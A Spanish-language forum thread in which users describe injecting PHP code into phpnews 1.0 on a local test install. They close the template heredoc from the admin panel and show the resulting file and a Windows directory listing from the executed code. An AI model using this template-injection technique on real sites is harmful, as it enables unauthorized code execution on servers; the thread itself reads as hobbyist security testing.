'_' :-o
Excelente :0
Estaba confundiendo el sistema, con el que estaba haciendo pruebas era con phpnews, no se por que los confundí
sorry ._________. intentaré hacer lo mismo con este :-)
Ya, despues de varios intentos logre inyectar codigo php ñ_ñ' siguiendo el tutorial que has puesto WHK
bien, basicamente es lo mismo solo que mejor
vamos a editar el templete, yo escogí el de news.php, o sea, donde se muestran las noticias xD
:http://localhost/phpnews/phpnews1.0/index.php?action=modtemp
esto nos muestra lo siguiente
<h1>
$subject
</h1>
<p>
$time by $username.
</p>
<p>
<strong>$titletext</strong>
</p>
<p>
$maintext | $comments | $sendtofriend
</p>
<hr /><br />
Si vemos el archivo
news_temp.php nos dirá todo
<?
print<<<EOT
<h1>
$subject
</h1>
<p>
$time by $username.
</p>
<p>
<strong>$titletext</strong>
</p>
<p>
$maintext | $comments | $sendtofriend
</p>
<hr /><br />
EOT;
?>
Cuando modificamos cualquier cosa desde el panel de administración lo refleja directamente en éste archivo ñ_ñ
Para finalizar, desde el panel de administración modificamos el template de modo que quede así:
<h1>
$subject
</h1>
<p>
$time by $username.
</p>
<p>
<strong>$titletext</strong>
</p>
<p>
$maintext | $comments | $sendtofriend
</p>
<hr /><br />
EOT;
Esto dará como resultado éste código en nuestro "news_temp.php"
<?
print<<<EOT
<h1>
$subject
</h1>
<p>
$time by $username.
</p>
<p>
<strong>$titletext</strong>
</p>
<p>
$maintext | $comments | $sendtofriend
</p>
<hr /><br />
EOT;
EOT;
?>
y tenemos magia x)
<script type="text/javascript"> <!--
function sendtof(desktopURL)
{
desktop = window.open(desktopURL, "SendToFriend", "toolbar=no,location=no,status=no,menubar=no,scrollbars=no,width=400,height=275,resizable=no");
}
// -->
<a name="2"><!-- 2 --></a> Siguiente prueba ñ_ñ
December 02, 2008, 10:55:16 AM by admin.
<a href="?action=fullnews&id=2">Full Story
</a> | |
<a href="javascript:sendtof('http://localhost/phpnews/phpnews1.0/news.phpsendtofriend.php?mid=2')">Send To Friend
</a> <hr /><br /> El volumen de la unidad G es AZIELITO
El n£mero de serie del volumen es: 476A-3939
Directorio de G:\Desarrollo\web\www\phpnews\phpnews1.0
19/11/2008 05:55 p.m.
<DIR> .
19/11/2008 05:55 p.m.
<DIR> ..
20/06/2003 07:44 p.m. 17,716 gpl.txt
16/07/2003 05:05 p.m. 2,100 headlines.php
11/07/2003 06:07 p.m. 118 headlines_temp.php
16/07/2003 05:05 p.m. 4,578 help.php
16/07/2003 05:10 p.m. 7,980 index.php
18/06/2003 11:33 p.m. 2,891 mysql.sql
16/07/2003 05:06 p.m. 10,793 news.php
11/07/2003 02:22 p.m. 4,058 phpnews_package.css
16/07/2003 04:12 p.m. 8,857 readme.html
16/07/2003 04:24 p.m. 20,679 se.lng
16/07/2003 05:06 p.m. 5,247 sendtofriend.php
11/07/2003 06:07 p.m. 1,203 sendtofriend_temp.php
11/07/2003 06:07 p.m. 602 sent_temp.php
20/11/2008 09:13 a.m. 103 settings.php
19/11/2008 05:55 p.m.
<DIR> smilies
08/04/2003 10:50 a.m. 837 bullet.gif
11/07/2003 06:07 p.m. 781 comment_temp.php
11/07/2003 06:07 p.m. 381 comments_temp.php
16/07/2003 04:24 p.m. 22,127 de.lng
16/07/2003 04:24 p.m. 20,272 en.lng
11/05/2003 04:29 p.m. 358 fullnews_temp.php
19/11/2008 05:55 p.m. 62,254 admin.php
16/07/2003 05:06 p.m. 19,086 install.php.bak
02/12/2008 11:28 a.m. 27 es.php
02/12/2008 11:35 a.m. 4,798 auth.php
26/05/2009 10:51 a.m. 1,344 phperror.log
26/05/2009 11:02 a.m. 391 news_temp.php
26 archivos 219,581 bytes
3 dirs 21,014,544,384 bytes libres
ñ_ñ
Gracias a WHK por el tuto anterior x)
Autor
En línea
- 
